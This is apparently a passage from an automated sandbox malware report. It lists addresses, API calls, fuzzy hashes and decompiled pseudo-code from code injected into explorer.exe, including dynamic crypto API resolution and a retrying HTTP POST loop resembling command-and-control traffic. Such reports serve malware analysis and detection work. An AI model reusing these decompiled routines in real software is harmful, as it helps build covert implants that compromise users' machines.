                                                                                                                                                                                              0x02f8d45b
                                                                                                                                                                                              0x02f8d45e
                                                                                                                                                                                              0x02f8d461
                                                                                                                                                                                              0x02f8d464
                                                                                                                                                                                              0x02f8d467
                                                                                                                                                                                              0x02f8d46a
                                                                                                                                                                                              0x02f8d475
                                                                                                                                                                                              0x02f8d478
                                                                                                                                                                                              0x02f8d47f
                                                                                                                                                                                              0x02f8d47f
                                                                                                                                                                                              0x02f8d484
                                                                                                                                                                                              0x02f8d487
                                                                                                                                                                                              0x02f8d489
                                                                                                                                                                                              0x02f8d48c
                                                                                                                                                                                              0x02f8d495
                                                                                                                                                                                              0x02f8d68e
                                                                                                                                                                                              0x02f8d68e
                                                                                                                                                                                              0x02f8d691
                                                                                                                                                                                              0x02f8d694
                                                                                                                                                                                              0x02f8d699
                                                                                                                                                                                              0x02f8d69f
                                                                                                                                                                                              0x02f8d6a2
                                                                                                                                                                                              0x02f8d6a2
                                                                                                                                                                                              0x02f8d6a5
                                                                                                                                                                                              0x02f8d6a9
                                                                                                                                                                                              0x02f8d6ab
                                                                                                                                                                                              0x02f8d6b3
                                                                                                                                                                                              0x02f8d6c0
                                                                                                                                                                                              0x02f8d6c0
                                                                                                                                                                                              0x02f8d6ca
                                                                                                                                                                                              0x02f8d6cc
                                                                                                                                                                                              0x02f8d6d4
                                                                                                                                                                                              0x02f8d6d4
                                                                                                                                                                                              0x02f8d6db
                                                                                                                                                                                              0x02f8d6db
                                                                                                                                                                                              0x02f8d49e
                                                                                                                                                                                              0x02f8d49f
                                                                                                                                                                                              0x02f8d4a4
                                                                                                                                                                                              0x02f8d4aa
                                                                                                                                                                                              0x02f8d4ac
                                                                                                                                                                                              0x02f8d4ad
                                                                                                                                                                                              0x02f8d4ae
                                                                                                                                                                                              0x02f8d4b3
                                                                                                                                                                                              0x02f8d4b4
                                                                                                                                                                                              0x02f8d4be
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d4c4
                                                                                                                                                                                              0x02f8d4cc
                                                                                                                                                                                              0x02f8d4d4
                                                                                                                                                                                              0x02f8d4da
                                                                                                                                                                                              0x02f8d4e1
                                                                                                                                                                                              0x02f8d4e9
                                                                                                                                                                                              0x02f8d4ea
                                                                                                                                                                                              0x02f8d4f1
                                                                                                                                                                                              0x02f8d4f4
                                                                                                                                                                                              0x02f8d4f5
                                                                                                                                                                                              0x02f8d4fc
                                                                                                                                                                                              0x02f8d4ff
                                                                                                                                                                                              0x02f8d506
                                                                                                                                                                                              0x02f8d507
                                                                                                                                                                                              0x02f8d50a
                                                                                                                                                                                              0x02f8d516
                                                                                                                                                                                              0x02f8d538
                                                                                                                                                                                              0x02f8d540
                                                                                                                                                                                              0x02f8d543
                                                                                                                                                                                              0x02f8d54e
                                                                                                                                                                                              0x02f8d54e
                                                                                                                                                                                              0x02f8d540
                                                                                                                                                                                              0x02f8d554
                                                                                                                                                                                              0x02f8d56a
                                                                                                                                                                                              0x02f8d579
                                                                                                                                                                                              0x02f8d57c
                                                                                                                                                                                              0x02f8d581
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d587
                                                                                                                                                                                              0x02f8d587
                                                                                                                                                                                              0x02f8d589
                                                                                                                                                                                              0x02f8d58a
                                                                                                                                                                                              0x02f8d58f
                                                                                                                                                                                              0x02f8d590
                                                                                                                                                                                              0x02f8d591
                                                                                                                                                                                              0x02f8d592
                                                                                                                                                                                              0x02f8d596
                                                                                                                                                                                              0x02f8d597
                                                                                                                                                                                              0x02f8d59c
                                                                                                                                                                                              0x02f8d59d
                                                                                                                                                                                              0x02f8d5a5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d5bb
                                                                                                                                                                                              0x02f8d5bd
                                                                                                                                                                                              0x02f8d5c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d5d9
                                                                                                                                                                                              0x02f8d5df
                                                                                                                                                                                              0x02f8d5ec
                                                                                                                                                                                              0x02f8d5fa
                                                                                                                                                                                              0x02f8d600
                                                                                                                                                                                              0x02f8d60c
                                                                                                                                                                                              0x02f8d611
                                                                                                                                                                                              0x02f8d616
                                                                                                                                                                                              0x02f8d61c
                                                                                                                                                                                              0x02f8d622
                                                                                                                                                                                              0x02f8d62a
                                                                                                                                                                                              0x02f8d63a
                                                                                                                                                                                              0x02f8d646
                                                                                                                                                                                              0x02f8d650
                                                                                                                                                                                              0x02f8d658
                                                                                                                                                                                              0x02f8d65d
                                                                                                                                                                                              0x02f8d660
                                                                                                                                                                                              0x02f8d668
                                                                                                                                                                                              0x02f8d668
                                                                                                                                                                                              0x02f8d668
                                                                                                                                                                                              0x02f8d66b
                                                                                                                                                                                              0x02f8d66f
                                                                                                                                                                                              0x02f8d670
                                                                                                                                                                                              0x02f8d674
                                                                                                                                                                                              0x02f8d678
                                                                                                                                                                                              0x02f8d681
                                                                                                                                                                                              0x02f8d687
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d687
                                                                                                                                                                                              0x02f8d662
                                                                                                                                                                                              0x02f8d666
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d666

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegisterClassExA.USER32(?), ref: 02F8D50D
                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 02F8D538
                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 02F8D543
                                                                                                                                                                                              • UnregisterClassA.USER32 ref: 02F8D54E
                                                                                                                                                                                                • Part of subcall function 02F88BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 02F88C3A
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,02F861C5), ref: 02F8D678
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ClassWindow$CreateDestroyFreeHeapRegisterUnregisterlstrlen
                                                                                                                                                                                              • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                                              • API String ID: 1751977465-2640591812
                                                                                                                                                                                              • Opcode ID: cfabc9ebcbd863e72d5de5913e47180a5b257ea2d53e8e511f38c3124a0dd551
                                                                                                                                                                                              • Instruction ID: 2c5213ef25bb384c61780e3164472d6ea58ac24354744be88e860e7e4cb04730
                                                                                                                                                                                              • Opcode Fuzzy Hash: cfabc9ebcbd863e72d5de5913e47180a5b257ea2d53e8e511f38c3124a0dd551
                                                                                                                                                                                              • Instruction Fuzzy Hash: B081D5B1E4021DAFDB10DFA5D884EEEBBB8FB08784F14456AE605E7290D7709A11CF64
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F928F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E02F928F0(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E02F9284B( &_v16);
				return 0;
			}











                                                                                                                                                                                              0x02f928f6
                                                                                                                                                                                              0x02f92908
                                                                                                                                                                                              0x02f9290c
                                                                                                                                                                                              0x02f92980
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f92982
                                                                                                                                                                                              0x02f9291c
                                                                                                                                                                                              0x02f92920
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f92928
                                                                                                                                                                                              0x02f9292a
                                                                                                                                                                                              0x02f9292f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f92939
                                                                                                                                                                                              0x02f9293d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9293f
                                                                                                                                                                                              0x02f92944
                                                                                                                                                                                              0x02f92946
                                                                                                                                                                                              0x02f92948
                                                                                                                                                                                              0x02f9294d
                                                                                                                                                                                              0x02f92952
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9295d
                                                                                                                                                                                              0x02f92967
                                                                                                                                                                                              0x02f9296b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9297a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,02F87B6A), ref: 02F92902
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 02F9291A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 02F92928
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 02F92937
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                              • API String ID: 667068680-129414566
                                                                                                                                                                                              • Opcode ID: 12e9fb44c1d4df58693b57b51e93464854f3a53cb0be50e24daf3463671b2cf8
                                                                                                                                                                                              • Instruction ID: 5c077173e255a03dac07b60a2c4845efb49cf73c9599822d193e8095f8a6d3f4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e9fb44c1d4df58693b57b51e93464854f3a53cb0be50e24daf3463671b2cf8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 49118232E4130A7BFF1597B58C51F9EF7AC9F84AD4F160065EB01F2150DBB1DA0196A4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8F7A6 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E02F8F7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E02F89DD8(0xd62);
				_v52 = E02F89DD8(0x8e9);
				_v48 = E02F89DD8(0xa93);
				_v44 = E02F89DD8(0x9a9);
				_t94 = E02F89DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E02F88D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E02F8A43D(_t190));
				_t102 =  *0x2f9f838; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x2f9f838; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x2f9f920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E02F8F73E(_t189);
							_t110 =  *0x2f9f838; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E02F8A065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x2f9f838; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E02F8A065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E02F8F6EC(_t116);
									}
									_t117 = E02F89DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x2f9f838; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E02F8A43D(_t193), _a4, _a8);
									E02F88B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E02F8A065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E02F88D6D( &_v20, 0, _t122);
										_t127 =  *0x2f9f838; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E02F89F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x2f9f838; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x2f9f838; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x2f9f838; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x2f9f838; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x2f9f838; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x2f9f838; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x2f9f838; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x2f9f838; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x2f9f838; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}





























































                                                                                                                                                                                              0x02f8f7b4
                                                                                                                                                                                              0x02f8f7c0
                                                                                                                                                                                              0x02f8f7c7
                                                                                                                                                                                              0x02f8f7d4
                                                                                                                                                                                              0x02f8f7d7
                                                                                                                                                                                              0x02f8f7e8
                                                                                                                                                                                              0x02f8f7ff
                                                                                                                                                                                              0x02f8f80c
                                                                                                                                                                                              0x02f8f819
                                                                                                                                                                                              0x02f8f826
                                                                                                                                                                                              0x02f8f829
                                                                                                                                                                                              0x02f8f82e
                                                                                                                                                                                              0x02f8f833
                                                                                                                                                                                              0x02f8f835
                                                                                                                                                                                              0x02f8f83d
                                                                                                                                                                                              0x02f8f845
                                                                                                                                                                                              0x02f8f84c
                                                                                                                                                                                              0x02f8f858
                                                                                                                                                                                              0x02f8f85b
                                                                                                                                                                                              0x02f8f869
                                                                                                                                                                                              0x02f8f86c
                                                                                                                                                                                              0x02f8f872
                                                                                                                                                                                              0x02f8f873
                                                                                                                                                                                              0x02f8f875
                                                                                                                                                                                              0x02f8f87e
                                                                                                                                                                                              0x02f8f87f
                                                                                                                                                                                              0x02f8f884
                                                                                                                                                                                              0x02f8f88a
                                                                                                                                                                                              0x02f8f894
                                                                                                                                                                                              0x02f8f894
                                                                                                                                                                                              0x02f8f896
                                                                                                                                                                                              0x02f8f89b
                                                                                                                                                                                              0x02f8f8a5
                                                                                                                                                                                              0x02f8f8b0
                                                                                                                                                                                              0x02f8f8b9
                                                                                                                                                                                              0x02f8f8bb
                                                                                                                                                                                              0x02f8f8bd
                                                                                                                                                                                              0x02f8f8cc
                                                                                                                                                                                              0x02f8f8e3
                                                                                                                                                                                              0x02f8f8e9
                                                                                                                                                                                              0x02f8f8ec
                                                                                                                                                                                              0x02f8f8f0
                                                                                                                                                                                              0x02f8f8f2
                                                                                                                                                                                              0x02f8f8f7
                                                                                                                                                                                              0x02f8f8f7
                                                                                                                                                                                              0x02f8f8fc
                                                                                                                                                                                              0x02f8f8fe
                                                                                                                                                                                              0x02f8f914
                                                                                                                                                                                              0x02f8f918
                                                                                                                                                                                              0x02f8f91d
                                                                                                                                                                                              0x02f8f91f
                                                                                                                                                                                              0x02f8f91f
                                                                                                                                                                                              0x02f8f933
                                                                                                                                                                                              0x02f8f93e
                                                                                                                                                                                              0x02f8f941
                                                                                                                                                                                              0x02f8f944
                                                                                                                                                                                              0x02f8f947
                                                                                                                                                                                              0x02f8f94c
                                                                                                                                                                                              0x02f8f951
                                                                                                                                                                                              0x02f8f951
                                                                                                                                                                                              0x02f8f954
                                                                                                                                                                                              0x02f8f956
                                                                                                                                                                                              0x02f8f97c
                                                                                                                                                                                              0x02f8f980
                                                                                                                                                                                              0x02f8f984
                                                                                                                                                                                              0x02f8f984
                                                                                                                                                                                              0x02f8f98e
                                                                                                                                                                                              0x02f8f996
                                                                                                                                                                                              0x02f8f99b
                                                                                                                                                                                              0x02f8f9a6
                                                                                                                                                                                              0x02f8f9ac
                                                                                                                                                                                              0x02f8f9b6
                                                                                                                                                                                              0x02f8f9b9
                                                                                                                                                                                              0x02f8f9be
                                                                                                                                                                                              0x02f8f9c2
                                                                                                                                                                                              0x02f8f9c7
                                                                                                                                                                                              0x02f8f9c7
                                                                                                                                                                                              0x02f8f9cc
                                                                                                                                                                                              0x02f8f9d0
                                                                                                                                                                                              0x02f8fa1b
                                                                                                                                                                                              0x02f8fa1d
                                                                                                                                                                                              0x02f8fa20
                                                                                                                                                                                              0x02f8fa28
                                                                                                                                                                                              0x02f8fa2c
                                                                                                                                                                                              0x02f8fa2f
                                                                                                                                                                                              0x02f8fa41
                                                                                                                                                                                              0x02f8fa4c
                                                                                                                                                                                              0x02f8fa4e
                                                                                                                                                                                              0x02f8fa62
                                                                                                                                                                                              0x02f8fa67
                                                                                                                                                                                              0x02f8fa6c
                                                                                                                                                                                              0x02f8faa1
                                                                                                                                                                                              0x02f8faa6
                                                                                                                                                                                              0x02f8faab
                                                                                                                                                                                              0x02f8faad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8faad
                                                                                                                                                                                              0x02f8fa70
                                                                                                                                                                                              0x02f8fa73
                                                                                                                                                                                              0x02f8fa73
                                                                                                                                                                                              0x02f8fa79
                                                                                                                                                                                              0x02f8fa7c
                                                                                                                                                                                              0x02f8fa7f
                                                                                                                                                                                              0x02f8fa7f
                                                                                                                                                                                              0x02f8fa81
                                                                                                                                                                                              0x02f8fa83
                                                                                                                                                                                              0x02f8fa89
                                                                                                                                                                                              0x02f8fa89
                                                                                                                                                                                              0x02f8fa8c
                                                                                                                                                                                              0x02f8fa8e
                                                                                                                                                                                              0x02f8fa90
                                                                                                                                                                                              0x02f8fa97
                                                                                                                                                                                              0x02f8fa97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8fa9a
                                                                                                                                                                                              0x02f8fa50
                                                                                                                                                                                              0x02f8fa56
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8f9d2
                                                                                                                                                                                              0x02f8f9d2
                                                                                                                                                                                              0x02f8f9d8
                                                                                                                                                                                              0x02f8f9de
                                                                                                                                                                                              0x02f8f9e1
                                                                                                                                                                                              0x02f8f9e6
                                                                                                                                                                                              0x02f8f9eb
                                                                                                                                                                                              0x02f8f9ee
                                                                                                                                                                                              0x02f8f9f3
                                                                                                                                                                                              0x02f8f9f3
                                                                                                                                                                                              0x02f8f9f6
                                                                                                                                                                                              0x02f8f9f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8f9f9
                                                                                                                                                                                              0x02f8f958
                                                                                                                                                                                              0x02f8f958
                                                                                                                                                                                              0x02f8f95e
                                                                                                                                                                                              0x02f8f964
                                                                                                                                                                                              0x02f8f967
                                                                                                                                                                                              0x02f8f96c
                                                                                                                                                                                              0x02f8f96f
                                                                                                                                                                                              0x02f8f972
                                                                                                                                                                                              0x02f8f974
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8f974
                                                                                                                                                                                              0x02f8f900
                                                                                                                                                                                              0x02f8f900
                                                                                                                                                                                              0x02f8f906
                                                                                                                                                                                              0x02f8f90c
                                                                                                                                                                                              0x02f8f9fc
                                                                                                                                                                                              0x02f8f9fc
                                                                                                                                                                                              0x02f8f9fc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8f9fc
                                                                                                                                                                                              0x02f8f8fe
                                                                                                                                                                                              0x02f8f8bf
                                                                                                                                                                                              0x02f8f9fe
                                                                                                                                                                                              0x02f8fa01
                                                                                                                                                                                              0x02f8fa03
                                                                                                                                                                                              0x02f8fa06
                                                                                                                                                                                              0x02f8fa09
                                                                                                                                                                                              0x02f8fa09
                                                                                                                                                                                              0x02f8fa12
                                                                                                                                                                                              0x02f8fa14
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8fa18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8fa18
                                                                                                                                                                                              0x02f8f88e
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT ref: 02F8F7D7
                                                                                                                                                                                              • memset.MSVCRT ref: 02F8F7E8
                                                                                                                                                                                                • Part of subcall function 02F88D6D: memset.MSVCRT ref: 02F88D7F
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 02F8F8BF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$ErrorLast
                                                                                                                                                                                              • String ID: POST
                                                                                                                                                                                              • API String ID: 2570506013-1814004025
                                                                                                                                                                                              • Opcode ID: 7bf736be38ac4b6439bc2acf7891c98ac497f041c97159ecbfdb17be8fb4daa2
                                                                                                                                                                                              • Instruction ID: e9448a1d667e8ec2c60cbbb6a0485732b89ee1ffd6d7a62d8e4b0501db1d742d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bf736be38ac4b6439bc2acf7891c98ac497f041c97159ecbfdb17be8fb4daa2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BA16D72E00218AFDB11EFA4DC48EAEF7B9EF48390F144569EA05E7260DB749A51CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F91464 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _snprintfqsort
                                                                                                                                                                                              • String ID: %I64d$false$null$true
                                                                                                                                                                                              • API String ID: 756996078-4285102228
                                                                                                                                                                                              • Opcode ID: 0fc338173fd181f0765d5822796810c69c2952ba6ab4e0ba776c1bde3137a503
                                                                                                                                                                                              • Instruction ID: 0d52ad7dcd8302c7e5e4dca3a7d5fc71ee92069d4b679b2bb764f18f1e077c5c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fc338173fd181f0765d5822796810c69c2952ba6ab4e0ba776c1bde3137a503
                                                                                                                                                                                              • Instruction Fuzzy Hash: BEE14A7290020BBBFF119F64CD45FAB3B69EF053C4F048429FE1996240E771DA618BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F850B3 Relevance: 9.3, APIs: 6, Instructions: 263stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E02F850B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				WCHAR* _v596;
				char _v600;
				intOrPtr _v604;
				char _v632;
				char _v636;
				void* __ebx;
				void* __esi;
				intOrPtr _t56;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t72;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr _t82;
				WCHAR* _t84;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t97;
				signed char _t104;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				void* _t114;
				WCHAR* _t115;
				void* _t126;
				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x2f9f81c; // 0x2fb0000
					_t110 =  *0x2f9f820; // 0x508f8b8
